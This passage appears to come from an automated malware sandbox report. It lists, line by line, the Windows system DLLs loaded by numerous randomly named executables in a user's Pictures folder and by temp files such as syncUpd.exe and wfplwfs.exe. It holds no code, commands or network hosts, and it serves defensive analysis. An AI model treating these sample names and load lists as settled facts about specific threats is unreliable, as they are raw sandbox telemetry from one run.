                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: netutils.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: propsys.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: oleacc.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: shfolder.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: msimg32.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: msvcr100.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: rstrtmgr.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: netutils.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: msimg32.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: msvcr100.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: winmm.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: powrprof.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: umpdc.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: winsta.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: sxs.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: amsi.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: msimg32.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: msvcr100.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: winmm.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: powrprof.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: umpdc.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: winsta.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: sxs.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: amsi.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: samcli.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: samlib.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: netutils.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: msimg32.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: msvcr100.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: winmm.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: powrprof.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: umpdc.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: winsta.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: sxs.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: amsi.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: propsys.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: oleacc.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: shfolder.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: msimg32.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: msvcr100.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: winmm.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: powrprof.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: umpdc.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: winsta.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: sxs.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: amsi.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeSection loaded: mstask.dll
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: propsys.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: oleacc.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: shfolder.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: propsys.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: oleacc.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: shfolder.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: msimg32.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: msvcr100.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: winmm.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: powrprof.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: umpdc.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: winsta.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: sxs.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: amsi.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: propsys.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: oleacc.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: shfolder.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: msimg32.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: msvcr100.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: winmm.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: powrprof.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: umpdc.dll
